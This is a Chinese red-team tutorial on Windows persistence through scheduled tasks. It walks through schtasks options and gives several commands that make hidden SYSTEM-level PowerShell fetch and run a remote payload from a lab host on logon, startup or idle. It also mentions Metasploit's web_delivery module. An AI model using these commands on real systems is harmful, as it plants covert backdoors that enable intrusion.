Window权限维持（二）：计划任务1

### Window权限维持（二）：计划任务1 #### 一、计划任务概述 Windows系统提供了强大的计划任务功能，可以通过schtasks.exe这个内置工具来安排程序或者脚本在指定的时间运行。这一特性不仅可以用于日常的系统维护工作，还能够成为Red Team在渗透测试中的一个重要武器。特别是对于那些寻求在目标系统上建立持久连接的操作者来说，计划任务提供了一种高效而隐蔽的方式。 #### 二、计划任务的持久化机制 **1. 持久化原理** 持久化是指在目标系统上长期保持对系统的控制能力，即使在系统重启后也能自动恢复。在Red Team操作中，常见的持久化方式包括但不限于服务安装、启动项添加、计划任务等。其中，计划任务由于其灵活性和隐蔽性，成为了非常受欢迎的选择之一。 **2. 执行方式** 计划任务可以通过多种方式执行，常见的有： - **用户登录时执行**：当用户登录到系统时，计划任务将会被执行。 - **系统启动时执行**：系统启动时触发计划任务。 - **用户空闲时执行**：如果用户长时间未进行任何操作，系统进入空闲状态时执行任务。 **3. 支持的有效载荷类型** 计划任务可以执行不同类型的有效载荷，包括但不限于： - **可执行文件**：如.exe文件。 - **Powershell脚本**：可以执行复杂的命令和逻辑。 - **Scriptlet**：一种小型脚本。 **4. 操作流程** 为了创建一个计划任务，可以使用schtasks命令。具体步骤如下： - **创建计划任务** ```cmd schtasks /create /tn TaskName /tr "C:\Path\To\Payload" /sc onlogon /ru System ``` 其中： - `/tn TaskName`：定义任务名称。 - `/tr "C:\Path\To\Payload"`：定义要执行的任务路径。 - `/sc onlogon`：指定任务在用户登录时执行。 - `/ru System`：使用System账户权限执行。 #### 三、示例与实践 以下是一些具体的示例命令，用于创建不同的计划任务： **1. 用户登录时执行** ```cmd schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.0.2.21:8080/ZPWLywg'))'" /sc onlogon /ru System ``` **2. 系统启动时执行** ```cmd schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.0.2.21:8080/ZPWLywg'))'" /sc onstart /ru System ``` **3. 用户空闲时执行** ```cmd schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.0.2.21:8080/ZPWLywg'))'" /sc onidle /i 30 ``` **4. 不同架构下的实现** 针对不同架构的系统，命令略有差异： - **x64架构**: ```cmd schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.0.2.21:8080/ZPWLywg'))'" /sc onlogon /ru System ``` - **x86架构**: ```cmd schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.0.2.21:8080/ZPWLywg'))'" /sc onlogon /ru System ``` #### 四、工具支持 在实际操作中，还可以借助第三方工具来简化流程。比如，Metasploit框架就提供了`exploit/multi/script/web_delivery`模块来托管和生成各种格式的有效载荷。通过设置payload和监听地址等参数，可以快速创建有效的计划任务。 #### 五、总结 通过上述介绍可以看出，Windows系统内置的计划任务功能为Red Team提供了强大的工具箱，可以轻松地在目标系统上建立持久连接。然而，值得注意的是，这些技巧和工具也应当谨慎使用，确保只在合法授权的情况下实施，以避免任何法律风险。此外，在实际操作过程中，还需要考虑到系统的安全性和稳定性，合理规划和实施计划任务，以达到最佳效果。